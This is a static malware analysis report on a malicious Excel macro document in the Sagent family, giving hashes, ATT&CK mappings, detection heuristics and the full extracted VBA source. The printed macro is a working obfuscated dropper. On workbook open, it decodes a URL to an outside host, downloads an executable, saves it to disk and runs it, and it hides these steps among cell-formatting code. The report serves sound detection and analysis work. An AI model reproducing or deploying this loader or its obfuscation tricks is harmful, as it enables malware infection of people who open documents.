Sagent — Office (OOXML) malware analysis

Static analysis result for SHA-256 52c3f4d9c87ea88a…

MALICIOUS

Office (OOXML)

203.9 KB First seen: 2020-09-07
MD5: d112a75d21d451aeb218ac6347fc50bc SHA-1: edb509e5e0c9ded8b91dd44242af0e02b8a8cd0a SHA-256: 52c3f4d9c87ea88a3f254388dc2b70a549bdd2d76e2ccd2af5010454f4fd095b
308 Risk Score

Malware Insights

Sagent · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The critical heuristics indicate that this OOXML document contains an obfuscated VBA loader designed to execute a payload. The Workbook_Open macro is responsible for downloading a file from the URL 'http://zandrosgranito.com/bug.exe' and executing it. This behavior is consistent with the Sagent malware family.

Heuristics 6

  • ClamAV: Xls.Malware.Sagent-10035294-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Sagent-10035294-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    ZQWePolBCfGHaMKWEqrPLOkVXGFDAPLZMgtrVX.write Wj11ZasMkPolVCGdMNHS6577HDHAZPLMNBCVTWR341QW.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set Wj11ZasMkPolVCGdMNHS6577HDHAZPLMNBCVTWR341QW = CreateObject(ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(beihj5ltqe2gia1td3d6rsw("B" & "" & chr(18) & "" & chr(86) & "@" & "O" & chr(86) & "" & chr(64) & "" & chr(69) & "" & chr(86) & "A" & "" & chr(68) & chr(86) & chr(64) & " " & "" & "V" & "A" & beihj5ltqe2gia1td3d6rsw("3" & "" ) & chr(86) & "" & chr(64) & chr(16) & "V" & "" & "@" & "" & chr(64) & chr(86) & "A" & "B" & "" & chr(86) & chr(68) & "" & " " & chr(86) & "C" & "" & "N" & "" & "V" & "B" & "" &  …
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Wj11ZasMkPolVCGdMNHS6577HDHAZPLMNBCVTWR341QW = CreateObject(ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(beihj5ltqe2gia1td3d6rsw("B" & "" & chr(18) & "" & chr(86) & "@" & "O" & chr(86) & "" & chr(64) & "" & chr(69) & "" & chr(86) & "A" & "" & chr(68) & chr(86) & chr(64) & " " & "" & "V" & "A" & beihj5ltqe2gia1td3d6rsw("3" & "" ) & chr(86) & "" & chr(64) & chr(16) & "V" & "" & "@" & "" & chr(64) & chr(86) & "A" & "B" & "" & chr(86) & chr(68) & "" & " " & chr(86) & "C" & "" & "N" & "" & "V" & "B" & "" &  …
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 12046 bytes
SHA-256: 7ae1440c7ef970a44b613558b4f21d97ee65e1acad37fb6cec705ff2bd25b82e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Loader"68 74 74 70 3A 2F 2F 7A 61 6E 64 72 6F 73 67 72 61 6E 69 74 6F 2E 63 6F 6D 2F 62 75 67 2E 65 78 65"
End Sub
Function fz10hh3vyu4rnnq(str As String) As Variant: Dim bytes() As Byte: bytes = str: fz10hh3vyu4rnnq = bytes: End Function
Function embdxmn253546v7rzgy7525(bytes() As Byte) As String: Dim str As String: str = bytes: embdxmn253546v7rzgy7525 = str: End Function

Function beihj5ltqe2gia1td3d6rsw(str As String) As String
    Const KoLaNBv98RqWRPXczBVJH_PL89VCG As String = "dony7ncz58hvdnrc01y6nfd"
    Dim Zpo9agGH12BCvMX0TSRLAPK() As Byte, SokNAH_() As Byte
    Zpo9agGH12BCvMX0TSRLAPK = fz10hh3vyu4rnnq(str)
    P90VCGfAsNCBRtAU_C = fz10hh3vyu4rnnq(KoLaNBv98RqWRPXczBVJH_PL89VCG)
    
    Dim Sola67BChdPo_NcBBn As Long
    Sola67BChdPo_NcBBn = UBound(Zpo9agGH12BCvMX0TSRLAPK)
    
    ReDim BCVPlokIgdh67BCGF_BQAZ(0 To Sola67BChdPo_NcBBn) As Byte
    
    Dim GOP As Long
    
    For GOP = LBound(Zpo9agGH12BCvMX0TSRLAPK) To Sola67BChdPo_NcBBn:
        If Not Zpo9agGH12BCvMX0TSRLAPK(GOP) = 0 Then
            c = Zpo9agGH12BCvMX0TSRLAPK(GOP)
            For i = 0 To UBound(P90VCGfAsNCBRtAU_C):
                c = c Xor P90VCGfAsNCBRtAU_C(i)
            Next i
            BCVPlokIgdh67BCGF_BQAZ(GOP) = c
        End If
    
    Next GOP
    
    beihj5ltqe2gia1td3d6rsw = embdxmn253546v7rzgy7525(BCVPlokIgdh67BCGF_BQAZ)
End Function


Public Sub Loader (Link As String)
	Range(beihj5ltqe2gia1td3d6rsw(chr(55) & "" & chr(71) & chr(76) & chr(60) & chr(69) & "" & chr(70) )).Select
    	Selection.Borders(xlDiagonalDown).LineStyle = xlNone
    	Selection.Borders(xlDiagonalUp).LineStyle = xlNone
    	With Selection.Borders(xlEdgeLeft)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    	End With
Dim Wj11ZasMkPolVCGdMNHS6577HDHAZPLMNBCVTWR341QW
	With Selection.Borders(xlEdgeTop)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    	End With
Dim ZQWePolBCfGHaMKWEqrPLOkVXGFDAPLZMgtrVX
 	With Selection.Borders(xlEdgeBottom)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    	End With
Dim shelaorl_babu
	With Selection.Borders(xlEdgeRight)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    	End With
Set Wj11ZasMkPolVCGdMNHS6577HDHAZPLMNBCVTWR341QW = CreateObject(ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(beihj5ltqe2gia1td3d6rsw("B" & "" & chr(18) & "" & chr(86) & "@" & "O" & chr(86) & "" & chr(64) & "" & chr(69) & "" & chr(86) & "A" & "" & chr(68) & chr(86) & chr(64) & " " & "" & "V" & "A" & beihj5ltqe2gia1td3d6rsw("3" & "" ) & chr(86) & "" & chr(64) & chr(16) & "V" & "" & "@" & "" & chr(64) & chr(86) & "A" & "B" & "" & chr(86) & chr(68) & "" & " " & chr(86) & "C" & "" & "N" & "" & "V" & "B" & "" & " " & "V" & chr(66) & " " & "" & "V" & "B" & "" & chr(78) & "V" & chr(67) & "B" & chr(86) & "C" & chr(66) & "" & chr(86) & "" & "C" & "" & chr(70) & "" )))
	With Selection.Borders(xlInsideVertical)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    	End With
Set ZQWePolBCfGHaMKWEqrPLOkVXGFDAPLZMgtrVX = CreateObject(ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(beihj5ltqe2gia1td3d6rsw("B" & "" & beihj5ltqe2gia1td3d6rsw(chr(49) ) & "" & "V" & "" & chr(66) & chr(66) & "" & "V" & "" & chr(66) & " " & "" & chr(86) & chr(66) & "B" & "V" & "B" & chr(68) & "" & "V" & chr(68) & chr(19) & chr(86) & "C" & beihj5ltqe2gia1td3d6rsw("3" & "" ) & "V" & "A" & chr(66) & "" & "V" & "A" & "" & "D" & chr(86) & "" & "@" & chr(67) & "" & chr(86) & chr(64) & "" & beihj5ltqe2gia1td3d6rsw(chr(49) ) & "" & chr(86) & chr(64) & "" & " " & "" )))
 	With Selection.Borders(xlInsideHorizontal)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    	End With
Set shelaorl_babu = CreateObject(ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(beihj5ltqe2gia1td3d6rsw("C" & "" & chr(65) & "" & chr(86) & "" & "C" & chr(69) & "V" & "" & "@" & chr(69) & "" & "V" & "" & "A" & "" & chr(68) & chr(86) & "@" & "" & "O" & "" & chr(86) & chr(65) & "" & "F" & "V" & "A" & "B" & "" & chr(86) & "" & "D" & " " & "V" & "" & chr(67) & "E" & "V" & chr(64) & chr(78) & "" & chr(86) & "" & "@" & "" & chr(67) & chr(86) & chr(64) & " " & chr(86) & "" & chr(64) & " " & "V" & "" )))
 	ActiveWindow.SmallScroll Down:=-12
    	Range(beihj5ltqe2gia1td3d6rsw(chr(55) & chr(71) )).Select
    	ActiveCell.FormulaR1C1 = beihj5ltqe2gia1td3d6rsw("%" & "X" & chr(56) & "" & " " & "" )
    	Range(beihj5ltqe2gia1td3d6rsw("4" & chr(71) )).Select
    	ActiveCell.FormulaR1C1 = beihj5ltqe2gia1td3d6rsw("8" & chr(23) & " " & chr(19) & "" )
    	Range(beihj5ltqe2gia1td3d6rsw(chr(53) & chr(71) )).Select
    	ActiveCell.FormulaR1C1 = beihj5ltqe2gia1td3d6rsw(chr(35) & " " & chr(31) & "" & chr(2) & "" )
    	Range(beihj5ltqe2gia1td3d6rsw(chr(50) & "" & chr(71) & "" )).Select
    	ActiveCell.FormulaR1C1 = beihj5ltqe2gia1td3d6rsw(chr(38) & "" & " " & "" & chr(31) & " " & "" & " " & "" )
    	Range(beihj5ltqe2gia1td3d6rsw(chr(51) & "" & beihj5ltqe2gia1td3d6rsw(chr(49) ) & "" )).Select
    	ActiveCell.FormulaR1C1 = beihj5ltqe2gia1td3d6rsw(chr(39) & "" & chr(2) & " " & "" )
    	Range(beihj5ltqe2gia1td3d6rsw(chr(48) & "" & "G" & chr(76) & "" & "<" & "E" & "" & "F" )).Select
Url = ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(Link)
	With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = False
    	End With
    	Selection.Merge
urloasjdklweqad_babu = ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(beihj5ltqe2gia1td3d6rsw("B" & chr(69) & "" & "V" & "" & "E" & " " & "" & "V" & "C" & "" & chr(21) & "V" & "C" & "" & chr(67) & "" & chr(86) & "" & "A" & "" & "E" & chr(86) & "" & chr(64) & "" & "C" & "" & "V" & chr(65) & "D" & "" & chr(86) & "" & chr(65) & "" & chr(69) & "V" & "C" & "" & " " & "" & chr(86) & "" & chr(67) & "F" & "V" & chr(65) & "" & chr(67) & "" & chr(86) & "" & chr(64) & chr(68) & chr(86) & chr(64) & " " & "" & chr(86) & "" & chr(64) & "" & chr(79) & "" & "V" & "@" & "" & chr(69) & "" & "V" & "C" & chr(21) & "" & "V" & chr(65) & "" & chr(69) & "V" & chr(65) & "@" & "" & "V" & "" & chr(64) & "" & "E" & "" & "V" & "@" & "" & chr(78) & "" & chr(86) & "" & chr(64) & chr(16) & chr(86) & "" & "A" & "E" & chr(86) & "" & chr(65) & "" & chr(66) & "" & chr(86) & chr(69) & chr(69) & chr(86) & chr(69) & "D" & chr(86) & "" & "D" & chr(19) & "V" & chr(64) & chr(67) & "V" & chr(65) & "N" & chr(86) & "" & chr(64) & "" & chr(67) ))
	With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = xlVertical
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    	End With
RUNCMD = ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(beihj5ltqe2gia1td3d6rsw("B" & chr(69) & "" & "V" & "" & "E" & " " & "" & "V" & "C" & "" & chr(21) & "V" & "C" & "" & chr(67) & "" & chr(86) & "" & "A" & "" & "E" & chr(86) & "" & chr(64) & "" & "C" & "" & "V" & chr(65) & "D" & "" & chr(86) & "" & chr(65) & "" & chr(69) & "V" & "C" & "" & " " & "" & chr(86) & "" & chr(67) & "F" & "V" & chr(65) & "" & chr(67) & "" & chr(86) & "" & chr(64) & chr(68) & chr(86) & chr(64) & " " & "" & chr(86) & "" & chr(64) & "" & chr(79) & "" & "V" & "@" & "" & chr(69) & "" & "V" & "C" & chr(21) & "" & "V" & chr(65) & "" & chr(69) & "V" & chr(65) & "@" & "" & "V" & "" & chr(64) & "" & "E" & "" & "V" & "@" & "" & chr(78) & "" & chr(86) & "" & chr(64) & chr(16) & chr(86) & "" & "A" & "E" & chr(86) & "" & chr(65) & "" & chr(66) & "" & chr(86) & chr(69) & chr(69) & chr(86) & chr(69) & "D" & chr(86) & "" & "D" & chr(19) & "V" & chr(64) & chr(67) & "V" & chr(65) & "N" & chr(86) & "" & chr(64) & "" & chr(67) ))
	Range(beihj5ltqe2gia1td3d6rsw(chr(48) & "" & "G" & chr(76) & "" & "<" & "E" & "" & "F" )).Select
    	ActiveCell.FormulaR1C1 = beihj5ltqe2gia1td3d6rsw("%" & "" )
   	Range(beihj5ltqe2gia1td3d6rsw(chr(48) & "" & "G" & chr(76) & "" & "<" & "E" & "" & "F" )).Select
    	ActiveCell.FormulaR1C1 = beihj5ltqe2gia1td3d6rsw("%" & "" ) & Chr(10) & beihj5ltqe2gia1td3d6rsw(" " & "" ) & Chr(10) & beihj5ltqe2gia1td3d6rsw(chr(27) & "" ) & Chr(10) & beihj5ltqe2gia1td3d6rsw(" " & "" ) & Chr(10) & beihj5ltqe2gia1td3d6rsw(" " & "" ) & Chr(10) & beihj5ltqe2gia1td3d6rsw(chr(15) & "" )
    	Range(beihj5ltqe2gia1td3d6rsw(chr(48) & "" & "G" & chr(76) & "" & "<" & "E" & "" & "F" )).Select
Wj11ZasMkPolVCGdMNHS6577HDHAZPLMNBCVTWR341QW.Open beihj5ltqe2gia1td3d6rsw(chr(49) ) + beihj5ltqe2gia1td3d6rsw("3" & "" ) + beihj5ltqe2gia1td3d6rsw("""" & "" ), Url, False
	With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlBottom
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    	End With
Wj11ZasMkPolVCGdMNHS6577HDHAZPLMNBCVTWR341QW.send
	Range(beihj5ltqe2gia1td3d6rsw(chr(48) & "" & "G" & chr(76) & "" & "<" & "E" & "" & "F" )).Select
    	With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlCenter
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    	End With
ZQWePolBCfGHaMKWEqrPLOkVXGFDAPLZMgtrVX.Type = 1
	With Selection.Font
        .Name = beihj5ltqe2gia1td3d6rsw(chr(53) & "" & chr(23) & chr(26) & "" & chr(31) & "" & chr(20) & " " & "" & chr(31) )
        .Size = 14
        .Strikethrough = False
        .Superscript = False
        .Subscript = False
        .OutlineFont = False
        .Shadow = False
        .Underline = xlUnderlineStyleNone
        .ThemeColor = xlThemeColorLight1
        .TintAndShade = 0
        .ThemeFont = xlThemeFontMinor
    	End With
ZQWePolBCfGHaMKWEqrPLOkVXGFDAPLZMgtrVX.Open
	Selection.Font.Bold = True
ZQWePolBCfGHaMKWEqrPLOkVXGFDAPLZMgtrVX.write Wj11ZasMkPolVCGdMNHS6577HDHAZPLMNBCVTWR341QW.responseBody
    	Selection.Font.Italic = True
ZQWePolBCfGHaMKWEqrPLOkVXGFDAPLZMgtrVX.savetofile urloasjdklweqad_babu, 2
    	Range(beihj5ltqe2gia1td3d6rsw(":" & "B" )).Select
shelaorl_babu.Run RUNCMD

End Sub

Public Function ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(ByVal AZdsFD12wPloAMNBgTRDCXfsDDA876BCGHAPLZCXV As String) As String
Dim ze4x92w065ei9elfwze79bj As String
Dim c9z9i3kyxz770u6iw6i3vvs As String
Dim i3z6g941zcmom4ssn108l76 As Long
    For QWPlaNBMZCX56RSzPLAJH651ARPMZXcNB = 1 To Len(AZdsFD12wPloAMNBgTRDCXfsDDA876BCGHAPLZCXV) Step 3
        ZCXvPLOMNBCVT654DSEraPLAKMHVXGgf = Chr$(Val(beihj5ltqe2gia1td3d6rsw(chr(80) & "" & chr(62) ) & Mid$(AZdsFD12wPloAMNBgTRDCXfsDDA876BCGHAPLZCXV, QWPlaNBMZCX56RSzPLAJH651ARPMZXcNB, 2)))
        c9z9i3kyxz770u6iw6i3vvs = c9z9i3kyxz770u6iw6i3vvs & ZCXvPLOMNBCVT654DSEraPLAKMHVXGgf
    Next QWPlaNBMZCX56RSzPLAJH651ARPMZXcNB
    ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC = c9z9i3kyxz770u6iw6i3vvs
End Function

Attribute VB_Name = "Sheet 1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 8704 bytes
SHA-256: 00943456f381a6261ae2f30a8e0dc116224bb607001ecb06d0da81ce83d21d05
Detection
ClamAV: Xls.Malware.Sagent-10035294-0
Obfuscation or payload: unlikely